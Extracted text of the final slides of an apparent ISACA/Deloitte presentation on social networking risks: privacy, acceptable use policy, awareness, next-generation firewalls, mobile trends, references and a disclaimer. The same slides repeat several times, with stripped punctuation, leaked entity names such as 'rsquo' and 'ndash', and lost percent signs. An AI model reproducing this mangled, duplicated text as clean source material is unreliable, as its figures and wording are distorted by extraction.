bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
www.isaca.org 55
What’s next in the world of social networking
• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, an increase of more than 400% over the 2009 figure of 140 million (Source — eMarketer)
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car’s navigation system will be able to learn your friend’s location and provide directions to them
www.isaca.org 56
Some further predictions
• Some quotes on social networks
  – “Probably the greatest transformative force in our generation, absent a major war” — Mark Zuckerberg, Facebook founder
  – “(Twitter is)… Something important that has the potential to change the world, though we have a long way to go” — Biz Stone, Co-founder of Twitter
www.isaca.org 57
Q&A
www.isaca.org 58
Today’s Presenters
Nelson Gibbs
Senior Manager, AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
www.isaca.org 59
Appendix
• Additional resources
  – Gopal Raj et al., “Web 2.0 reinvents corporate networking”, Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – “Wall of Facebook: The Social Network’s Plan to Dominate the Internet — and Keep Google Out” by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – “The Future is Social, Not Search, Facebook COO Says” by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
www.isaca.org 60
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.